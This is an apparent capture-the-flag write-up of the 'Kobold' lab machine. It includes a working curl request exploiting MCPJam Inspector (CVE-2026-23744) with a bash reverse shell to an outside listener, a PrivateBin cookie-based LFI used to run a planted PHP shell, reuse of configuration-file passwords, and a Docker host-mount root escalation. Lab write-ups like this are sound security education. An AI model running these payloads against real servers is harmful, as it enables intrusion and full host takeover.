---
layout: post
title: Kobold - CTF
date: 2026-03-23
pid: "3079"
category: "CTFs"
difficulty: "EASY"
description: "Chaining RCE in MCPJam with an LFI-to-RCE pivot in PrivateBin to exploit an internal Docker management service for root access."
tags: [HTB, Linux, SSH, Docker]
unlock_date: 2026-08-15 12:00:00 -0700
---
### 1. Overview
This challenge involved exploiting multiple services across different subdomains to gain initial access and escalate privileges. A vulnerable MCP service allowed remote command execution, which provided a shell as a low-privileged user. Further enumeration revealed a vulnerable PrivateBin instance running inside a Docker container, which was used to achieve code execution within the container. Credentials recovered from configuration files were then used to access an internal management interface, which allowed full control over Docker and ultimately led to root access.

### 2. Recon
To begin, I ran a standard Nmap scan to find open ports and services on the target.
```
└─$ nmap -sCV 10.129.9.208 --min-rate 5000
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to https://kobold.htb/
443/tcp open  ssl/http nginx 1.24.0 (Ubuntu)
| ssl-cert: Subject: commonName=kobold.htb
| Subject Alternative Name: DNS:kobold.htb, DNS:*.kobold.htb
```

The scan showed three open ports:

- **22 (SSH)**
- **80 (HTTP)**
- **443 (HTTPS)**

The HTTP service redirected to `kobold.htb`, so I added that domain to my hosts file. The scan also included `DNS:*.kobold.htb`. This suggested that more subdomains might exist, so I ran some subdomain fuzzing using `ffuf`.
```
└─$ ffuf -u https://kobold.htb -H "Host: FUZZ.kobold.htb" \
-w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fc 302
```

This revealed two valid subdomains:
```
mcp.kobold.htb
bin.kobold.htb
```

After adding both to my hosts file, I began investigating each one.

- `bin.kobold.htb` was running **PrivateBin v2.0.2**
- `mcp.kobold.htb` was running **MCPJam Inspector v1.4.2**

The MCPJam version was known to be vulnerable to: `CVE-2026-23744`
### 3. Foothold
The MCPJam vulnerability allowed arbitrary command execution by sending a crafted request to the API endpoint. Using this, I started a listener and prepared a reverse shell payload and sent it to the server.
```
└─$ curl -skL -X POST https://mcp.kobold.htb/api/mcp/connect \
     -H "Content-Type: application/json" \
     -d '{
       "serverConfig": {
         "command": "/bin/bash",
         "args": ["-c", "bash -i >& /dev/tcp/10.10.14.214/9001 0>&1"],
         "env": {}
       },
       "serverId": "pwn_attempt"
     }'
```

This request returned a shell as the user: `ben`
### 4. Root
After gaining access as `ben`, I started standard priv-esc enumeration. Running `sudo -l` was not useful since I did not have the user’s password.

Checking for running services revealed that an internal service was listening on port **3552**.
```
ben@kobold:/privatebin-data/data$ netstat -tulnp
tcp6       0      0 :::3552                 :::*                    LISTEN
```

I then explored the filesystem and found a directory named: `/privatebin-data`

At the same time, I found that **PrivateBin v2.0.2** was vulnerable to: `CVE-2025-64714`

This vulnerability allows **Local File Inclusion (LFI)**, which can lead to RCE if a PHP file can be included.

To confirm the vulnerability, I tested the known payload:
```
└─$ curl -sk -v --cookie "template=../cfg/conf" https://bin.kobold.htb
```

This returned a **500 error**, while adjusting the path returned a valid response:
```
└─$ curl -sk -v --cookie "template=../../cfg/conf" https://bin.kobold.htb
```

This confirmed that LFI was working and since I had write access to `/privatebin-data/data`, I created a PHP reverse shell in that directory
```
ben@kobold:/privatebin-data/data$ cat shell.php
<?php
...[SNIP]...
```

After setting up a listener, I triggered the file through the LFI vulnerability.

```
└─$ curl -sk --cookie "template=../data/shell" https://bin.kobold.htb
```

This executed the PHP file and gave me a shell inside the **Docker container** running PrivateBin.

Inside the container, I located the configuration file: `/srv/cfg/conf.php`. This file had two credentials:
```
ComplexP@sswordAdmin1928
Z3r0P4ss
```

Earlier, I had seen that a service was running on port **3552**, which appeared to be an **Arcane Docker Manager**. Since it was only accessible locally, I forwarded the port using SSH.

After accessing the web interface, I attempted to log in using the default username `arcane` along with the passwords. The following credentials worked: `arcane:ComplexP@sswordAdmin1928`

With admin access to the dashboard, I was able to create a new Docker container. Since pulling new images wasnt working, I used an existing cached image.

When creating the container, I mounted the host filesystem into it and started a shell as root. This provided direct access to the host system, allowing me to retrieve the root flag.

### 5. Conclusion
Initial access was gained by exploiting a vulnerability in the MCPJam service, which allowed remote command execution and provided a shell as the `ben` user. From there, further enumeration revealed a vulnerable PrivateBin instance that allowed local file inclusion. By placing a PHP shell in a writable directory and triggering it through the LFI, it was possible to gain code execution inside the container.

Credentials recovered from the PrivateBin configuration were then used to access an internal management interface running on port 3552. With administrative access to this service, a new Docker container was created with the host filesystem mounted, which ultimately resulted in root access on the machine.
